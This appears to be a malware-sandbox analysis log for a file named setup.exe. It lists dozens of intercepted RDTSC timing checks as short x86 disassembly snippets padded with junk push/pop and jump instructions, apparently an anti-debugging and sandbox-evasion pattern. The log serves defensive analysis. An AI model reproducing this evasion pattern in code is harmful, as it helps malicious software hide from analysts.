Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E97E3C second address: E97E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FF32CFB7201h 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 jmp 00007FF32CFB71FAh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 jno 00007FF32CFB71F6h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E97E75 second address: E97E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 ja 00007FF32CDD6566h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E982B4 second address: E982CC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FF32CFB71FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E982CC second address: E982D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9844F second address: E98466 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7203h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E98466 second address: E98472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FF32CDD6566h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E98795 second address: E98799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9BD2C second address: E9BD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF32CDD6566h 0x0000000a jmp 00007FF32CDD656Dh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9B534 second address: E9B53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9B53A second address: E9B55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FF32CDD6579h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9B7CC second address: E9B7F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007FF32CFB7204h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9B7F0 second address: E9B7FE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 jp 00007FF32CDD656Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: E9BA74 second address: E9BA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA2DAA second address: EA2DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD656Bh 0x00000009 jmp 00007FF32CDD656Bh 0x0000000e jmp 00007FF32CDD6576h 0x00000013 popad 0x00000014 jmp 00007FF32CDD6575h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA2DF0 second address: EA2DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA2FAE second address: EA2FB8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD656Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA33C0 second address: EA33C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA33C4 second address: EA33E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF32CDD6571h 0x0000000d js 00007FF32CDD6566h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA33E3 second address: EA33F4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA33F4 second address: EA3412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6578h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA3412 second address: EA3423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF32CFB71FAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA36C9 second address: EA36CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA36CD second address: EA36EE instructions: 0x00000000 rdtsc 0x00000002 js 00007FF32CFB71F6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FF32CFB7203h 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA36EE second address: EA36F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA36F5 second address: EA3718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB71FDh 0x00000009 jne 00007FF32CFB71F6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 jl 00007FF32CFB71FEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA3F66 second address: EA3F9D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6568h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jng 00007FF32CDD6566h 0x00000015 jmp 00007FF32CDD656Eh 0x0000001a push eax 0x0000001b pop eax 0x0000001c popad 0x0000001d jmp 00007FF32CDD6571h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA4810 second address: EA4820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FF32CFB71FAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA4820 second address: EA4838 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CDD6568h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jne 00007FF32CDD6566h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA4838 second address: EA484A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA484A second address: EA484E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA484E second address: EA485A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FF32CFB71F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA9AD0 second address: EA9ADD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA9ADD second address: EA9B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7202h 0x00000009 popad 0x0000000a push ebx 0x0000000b jmp 00007FF32CFB71FDh 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EA9B07 second address: EA9B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EAA024 second address: EAA028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EAA1C6 second address: EAA1D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF32CDD6566h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EAA1D2 second address: EAA1D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EAA1D6 second address: EAA1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EAA4AA second address: EAA4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DF8E2D second address: DF8E45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: DF8E45 second address: DF8E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FF32CFB71F6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB31F7 second address: EB3212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6577h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBB976 second address: EBB98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FF32CFB71FCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBB98F second address: EBB995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB9C41 second address: EB9C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FF32CFB71F8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB9C51 second address: EB9C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD6578h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB9C6F second address: EB9C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB9C73 second address: EB9C7C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA46B second address: EBA48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF32CFB7208h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA48E second address: EBA492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA79F second address: EBA7A5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA8FA second address: EBA919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FF32CDD6572h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA919 second address: EBA930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB71FEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA930 second address: EBA938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EBA938 second address: EBA971 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7208h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF32CFB7207h 0x0000000e jl 00007FF32CFB71F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB969A second address: EB96A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EB96A2 second address: EB96B6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FF32CFB71F6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC245C second address: EC2462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC2462 second address: EC2474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007FF32CFB71F8h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC2474 second address: EC2481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC2481 second address: EC2487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC2487 second address: EC248B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EC2151 second address: EC2185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007FF32CFB7203h 0x0000000b pop esi 0x0000000c popad 0x0000000d jne 00007FF32CFB7218h 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007FF32CFB71FEh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: ECF1E5 second address: ECF1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jng 00007FF32CDD6566h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: ED1BC8 second address: ED1BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF32CFB71FDh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: ED1BE0 second address: ED1BE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: ED1BE4 second address: ED1BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE51EB second address: EE51EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE51EF second address: EE520B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7205h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE520B second address: EE5216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE503D second address: EE5046 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE5046 second address: EE506F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6571h 0x00000009 jno 00007FF32CDD6566h 0x0000000f jmp 00007FF32CDD656Dh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE506F second address: EE5074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE5074 second address: EE507C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE7A01 second address: EE7A0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007FF32CFB71F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE917C second address: EE9195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6573h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE9195 second address: EE919A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE919A second address: EE91DB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF32CDD6568h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jne 00007FF32CDD656Eh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 jmp 00007FF32CDD6579h 0x0000001a pop edi 0x0000001b pushad 0x0000001c push edi 0x0000001d pop edi 0x0000001e ja 00007FF32CDD6566h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE91DB second address: EE91E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EE91E0 second address: EE9203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD656Bh 0x00000009 jmp 00007FF32CDD6572h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EEB71F second address: EEB72E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FF32CFB71F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EEB72E second address: EEB734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EEB734 second address: EEB73F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF1A0D second address: EF1A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF1A11 second address: EF1A1D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF32CFB71F6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF0376 second address: EF037C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF0635 second address: EF063B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF063B second address: EF0657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CDD6576h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF0657 second address: EF0675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF07C1 second address: EF0801 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FF32CDD6574h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop esi 0x00000019 jng 00007FF32CDD6578h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF0984 second address: EF099E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FF32CFB71FFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF099E second address: EF09A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF0C3A second address: EF0C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FF32CFB7201h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF523E second address: EF5250 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FF32CDD656Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: EF5250 second address: EF5254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
